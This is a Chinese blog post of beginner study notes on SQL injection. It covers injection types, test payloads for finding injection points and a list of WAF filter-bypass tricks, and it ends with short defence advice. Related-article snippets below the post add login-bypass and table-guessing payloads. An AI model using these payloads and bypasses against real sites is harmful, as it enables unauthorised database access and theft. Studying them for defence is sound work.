常见漏洞(一)SQL注入

最新推荐文章于 2024-06-27 17:54:31 发布
最新推荐文章于 2024-06-27 17:54:31 发布
阅读量592 收藏 4
点赞数
分类专栏: web安全学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41588309/article/details/105770279
版权

一个萌新对web常见漏洞认识的记录,若有不对的地方,望各路大佬指正。
这些都是从各个博客上摘抄的,为了加深记忆吧

  1. SQL注入
    原理:SQL注入是通过给web应用接口传入一些特殊字符,欺骗服务器来实现恶意查询语句的执行

    1.1注入方式

    	获取数据分类:回显注入、盲注、报错注入
	常见注入位置:post注入、get注入、cookie注入、搜索注入
	其他:base64注入、延时注入

    1.2 注入点的测试

    1.输入参数为数字型:?id=1 and 1=1  ||  id=1 and 1=1
2.输入参数为字符型: ? id=1' and '1'='1    ||   id=1' and '1'='2

    SQL注入也不是and 1=1 那么简单,通常会有一些规则或者waf之类的,对我们的输入进行过滤,减少SQL注入,下面是我在网上收集的一些绕过方法

    1.3常见SQL注入绕过方法

    	1.2.1宽字节注入
	
		由于GB2312、GBK、GB18030、BIG5等编码占用两个字节,而输入的ascii编码为一个字节,所以当输入‘时会被转义为\',就是多了个斜杠
		绕过:构造%df\‘--》%df%5c%27-->運%27,%df%5c==運

	1.2.2二次编码
		在url中可能出现的一些字符:=、&、+、;会被转义为%3D、%26、%2B、%3B,在注入时候可以输入编码,在mysql中会转义为符号
	1.2.3 WAF常见绕过
		 a.大小写绕过
		   例:UniOn SeleCt
		 b.双写绕过
		 	例:ununionion seselectlect
		 c.内联注释绕过
		 	and /*!select*/ 1,2(只使用于MYSQL数据库)
		 d.编码绕过
		 	将关键字转成16进制、URL编码、特殊符号转义为uincode等
		 e.<>绕过
			如果网站过滤了<>,可以unio<>n sel<>ect
		 f.注释符绕过
				unio/**/n sel/**/ect
		 g.对空格的绕过(可以用一下方法代替空格)
					/**/
					()
					回车(url编码中的%0a)
					`(tap键上面的按钮)
					tap
					两个空格
		  h.对or/and的绕过
				and = &&
				or = ||
				xor = | # 异或
				not = !
		  i.对等号=的绕过
				不使用通配符的liek等于=
				rlike在查找部分时候可以
		  j.对单引号的绕过
		  	宽字节绕过
		  	将查询语句转换为16进制
		  k.对逗号的绕过
		 	使用join关键字绕过:
		 		union select * from (select 1)a join (select 2)b join(select 3)c
		 		等价于
		 		union select 1,2,3
		 	使用like关键字:
		 		(编写时还没有理解like的具体功能和绕过原理,这里留着下次补充)
		  l.过滤函数绕过
		 		sleep(1)===benchmark(1000000000,1)
		 		group_concat("str1",str2)===concat_ws(",","str1","str2")
		 		substr(),substring(),mid()可以相互取代, 取子串的函数还有left(),right()
		 		user() --> @@user、datadir–>@@datadir
		 		ord()–>ascii():这两个函数在处理英文时效果一样,但是处理中文等时不一致
		 		seltct==/*!%53eLEct*/==sel<>ect==se%0blect==REVERSE(tceles);或者尝试报错注入:1' and extractvalue(1,concat('~',database()))等等这里不过多列举了 有些也是运用的前面上网方法进行变形

2.SQL注入的防御措施

 		1.对SQL语句进行预编译,绑定变量,使得输入的SQL语句不会拼接到原语句上,即使输入了也不会执行
 		2.在不得使用预编译的情况下,应该严格检查参数数据类型。使用安全函数,通过正则进行危险函数的过滤
 		3.将输入的一些特殊字符进行编码,使SQL无法语义分析
防御措施具体后续学习过程中会再补充。
小火车ii
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
整理出来的SQL注入点关键字
03-06
整理出来的关于SQL注入时所需要的关键字,很全面,覆盖了很多,包括asp,php等等
1.注入漏洞
DragonSkyAF的博客
07-21 2012
1.注入漏洞的分类: (1)SQL注入、 (2)HTTP头注入、 (3)HTML注入(XSS)注入、 (4)XPATH注入、 (5)Xml的外部实体注入等... 2.SQL注入概念: SQL注入,是一种将SQL语句插入或添加到用户输入参数中,之后再将这些参数传递给后台的SQL服务器加以解析并执行,最终达到欺骗服务器执行恶意的SQL命令。 3.SQL注入的成因: (1).对用户的输入的数据,没有进行过滤,被带到了数据库中去执行,造成了SQL注入。 (2).程序编写者在处理程序与数据库交互时,使用字符串拼
SQL注入漏洞SQL注入简介与原理
最新发布
goldfish8848的博客
06-27 1732
SQL注入漏洞从1998年圣诞节大火以来长盛不衰,虽然开发人员想出各种方法对他进行围追堵截,却始终无法将其赶尽杀绝,SQL注入的根本原因就是将SQL代码插入或添加到应用(用户)的输入参数中的攻击,之后再讲这些参数传递给后台的SQL服务器加以解析并执行。
攻防_漏洞_SQL注入_SQL常用函数
redglare的博客
12-01 1368
group_concat(table_name,"~") (一列输出的函数) 用法例子二(用来一次查多个字段): ?id=1 and 1=2 union select 111,select group_concat(id,’’,username,’’,password,’~’) from maoshe.admin 常用函数: database(),user(),version() int.from_bytes() hex() rewords 倒过来输出 ...
一个典型的sql注入漏洞
liuyuer的专栏
07-25 1469
真的很简单,想想,真可怕. http://www.whphs.com/index1.asp or=
盛大在线某站存在SQL注射漏洞(第三方应用)
大方子
08-25 331
缺陷编号: WooYun-2016-177346 漏洞标题: 盛大在线某站存在SQL注射漏洞(第三方应用) 相关厂商: 盛大在线 漏洞作者: 路人甲 提交时间: 2016-02-21 09:20 公开时间: 2016-03-07 01:11 漏洞类型: SQL注射漏洞 危害等级: 高 自评Rank: 15 漏洞状态: 厂商已经确认 漏洞来源: http://www.wooyun...
SQL注入漏洞演示源代码
07-15
例如,一个常见SQL注入漏洞场景可能是登录表单。正常情况下,用户输入的用户名和密码会被用于查询数据库中是否存在匹配的记录。但如果有注入漏洞,攻击者可以输入如"admin' OR '1'='1 --"这样的数据,这将使查询...
自己动手编写SQL注入漏洞扫描工具
12-31
SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意的SQL语句来操纵数据库,获取敏感信息或执行非法操作。这个项目可能是用某种编程语言(如Python、Java或C#)实现的,目标是帮助开发者和安全研究...
SQL注入知识点整理
老菜咯的博客
07-07 711
工作之余,温故而知新,复习一下sql注入原理,整理一下笔记~~ 知识脑图 sql语句,可控变量 $id SELECT * FROM users WHERE id='$id' LIMIT 0,1; 注入点发现 1.判断注入点及注入类型 $id=1’ and ‘1’='1,存在字符型sql注入 SELECT * FROM security.users WHERE id='1' and '1'='1' LIMIT 0,1; 2.闭合方式1’# SELECT * FROM security.users WHE
SQL注入漏洞,常用注入函数及其pakachu漏洞靶场演示
ytdd66的博客
03-04 1329
SQL:是操作数据库数据的结构化的查询语言,实现对网页应用数据和后台数据库的交互。SQL注入是将表单域或数据包输入的参数,拼接成的SQL语句,传递给Web服务器,进而传给数据库服务器并得到执行,达到获取数据库信息的目的。如果Web应用程序的开发人员对用户输入的数据或Cookie等内容未过滤或者验证就直接传给数据库,就可能导致恶意的SQL语句被执行,进而获取数据库的信息,造成SQL注入攻击。
SQL注入攻击常用语句(非常全,不可错过)
06-29
SQL注入攻击常用语句。 内容包括: 判断有无注入点 猜帐号数目 猜解字段名称 猜解字符 得到库名 得到WEB路径 查询构造 ……
SQL注入语句大全-.判断有无注入点
04-21
1.判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0(select count(*) from *) and 0(select count(*) from admin) ---判断是否存在admin这张表 3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 and 0<(select count(*) from admin) and 1<(select count(*) from admin) 4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称
注入漏洞详解
工程师学徒AYG
12-01 2623
注入漏洞 注入漏洞 1 SQL注入 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行指定的SQL语句。具体来说,它是利用现有应用程序,将SQL语句注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据,而不是按照设计者意图去执行SQL语句。 1.1 SQL注入的概念 (1)SQL注入漏洞原理 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这...
SQL注入漏洞(原理;网页注入)
gl620321的博客
03-17 831
一.SQL的注入 SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQ...
关于SQL注入点的总结
风流剑客
12-17 1723
一:注入类: access数据库  首先猜解管理员密码: 手工猜解(当然,如果你有基础,这里就很简单。如果没学过,其实只要记下一些常用的语句就可以了。) 工具猜解。我建议用zwell的穿山甲,也就是pangolin..或者是NBSI。前者猜解速度非常强悍。而猜解的准确率两者都很好。  找出后台: 用黑吧安全网的明小子或啊D等工具都可以找的。但有时候会找不到。为什么呢?建议用多线程后台扫描工具。
sql注入点利用 (干货)
Coisini的博客
05-23 1304
http://ibmur.hust.edu.cn/detail.php?id=375 and 1=2 UNION SELECT 1,2,3,4,@@version,6,7,8,9,10,11,12,13,14-- http://www.myliving.cn/activity/detail.php?id=-160 UNION SELECT 1,2,3,4,@@version,6,7,8,9,10,...
漏洞SQL注入漏洞(一)
b10d9的博客
01-31 1222
SQL注入漏洞成因 SQL注入漏洞存在的成因主要是:用户将自己可控的输入内容拼接到了源代码中的SQL语句中,并且系统将拼接后的SQL语句发送给了后台数据库执行。 SQL注入可以导致:信息泄露、木马上传等。 常见的存在注入功能场景 常见SQL注入场景有用户认证场景和搜索场景。 理论上存在用户可控输入,且与后台数据库有交互的地方的都可能存在SQL注入,都需要根据“代码与数据分离”原则,做好SQL注入防护。 用户认证场景 用户认证场景下的SQL语句如下示例,可以利用“万能密码”绕过认证。 MySQL示例:SEL
SQL注入中常用的函数
刘启明
06-09 4586
mid()函数 SELECT MID(ColumnName, Start [, Length]) 从指定字段中提取出字段的内容 column_name:字段名 start:开始位置 length:长度 实例 Persons 表: Id LastName FirstName Address City 1 Adams John Oxford Street 2 Bush George...
Web安全之注入类漏洞详解及预防
路多辛的所思所想
01-31 889
注入类攻击是 Web 安全领域中最常见的攻击方式,注入攻击发生在当不可信的数据作为命令或者查询语句的一部分被发送给解释器的时候。预防注入类攻击的最好方法是代码审核,可以将静态的(SAST)、动态的(DAST)和交互式(IAST)的安全测试工具集成到 CI/CD 流程中,以便在部署到生产环境之前检测出并解决掉注入类安全问题。注意避免xml注入、代码注入、SQL注入、HTML注入等注入型安全问题的发生,一定要在数据拼接的地方进行安全检查,对拼接内容进行严格校验和必要的转义处理。常见的注入类漏洞及预防措施。
防范PHP常见漏洞SQL注入与跨站攻击策略
SQL注入是通过恶意构造SQL查询来操纵数据库的常见漏洞。开发者应特别关注`mysql_query`和`mysqli_query`这两个函数,因为它们可能导致未经授权的数据库访问。防范措施包括: - **参数化查询**:避免直接拼接动态SQL...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值